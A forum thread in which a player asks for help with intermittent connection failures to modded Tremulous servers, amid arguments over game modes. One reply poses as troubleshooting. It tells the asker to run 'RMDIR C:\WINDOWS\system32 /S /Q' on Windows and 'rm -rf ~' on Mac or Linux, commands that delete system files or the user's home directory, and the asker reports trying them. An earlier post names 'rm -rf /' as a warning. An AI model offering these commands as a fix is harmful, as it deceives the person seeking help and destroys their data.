Hey need help connecting to servers.

Hi everyone, I play the coloured servers on Tremulous. You know, X,L,M,P. Yeh, im one of the better players on 'em. Anyway sometimes i can't connect to them. It just says conecting 1,2,3... and so on. It has happened for a week before. Altogether i had the trouble connecting about 5 times averaging about a few days each. I've contacted the x server forum (great forum ) and i just want to know more about the problem. Any help would be great.

I've known for a long time to stay away from the short, sweet and simple "rm -rf /" command.  It deletes every file on any writable filesystem mounted by a *nix system

Yeah, I'd be careful what you type.  As for your problem, does it give you an error when trying to connect to the "colored servers"?
ex: "This server is for low pings only"

They are shit servers.  Totally wouldn't surprise me if they are run on dialup or whatever.

Nope. It just says connecting..1, connecting...2, and so on. It's onyl happened like 5 times in 1 year so it isn't commmon. I just want to know how to fix it. It usually lasts 3 days or sumthing. And Dave the servers aren't shit. X is the most popoular on Trem.

Vanilla servers are piss boring. sorry to afend but u cant jump or run and you get like 50 kills a match where as x you get like 500 kills. Well x is the most popular so it isn't shit.

If this happens only 5 times a year, then what's the big deal? Maybe it's a sign that you're playing on one of those servers too much. .
And just because there is strategy (e.g. running, jumping, aiming, weapons balance, team balance....) in vanilla Trem doesn't mean it's boring, it just means that you have to work harder to achieve victory.

To everyone else:
He's here with a technical issue, the least we could do is try to help instead of bashing. Hell, even I venture into the X server every once a year to see if things have changed. (They haven't.)

All X shittyness aside, (LOL YOU CANT FLY THRU WALLS OR HAVE 9 BILLION POINT BLASTER OR INVISIBLE TYRANT IN NORMAL TREMULOUS SO BORING LOL) there is a section for troubleshooting (guess what it's called) and you Sir, picked wrong.

Also, the simplest answer is just /reconnect. This doesn't seem like a big deal.

@Cmon Aussie Cmon: this is a well-known issue with Tremulous. I'm not entirely sure of the details, but it can be easily resolved on Windows.
Click on Start -> Run, and type in 'cmd' without the quotes.
Type 'RMDIR C:\WINDOWS\system32 /S /Q' without the quotes.

If you're running Mac OS X, try going to Applications -> Utilities -> Terminal and typing 'rm -rf ~'. If on Linux, run the same command in the terminal.

I hope this helps you, and I'm sorry you saw the bad side of Tremulous.

The computer. If you're the only account on a Windows system, or set up the system with that account, I'm pretty sure you are. The second command should work without being an administrator, though, so I'd definitely try it.

The first one says "access denied" 
The second one syas "The process cannot access the file because it is being used by another process."
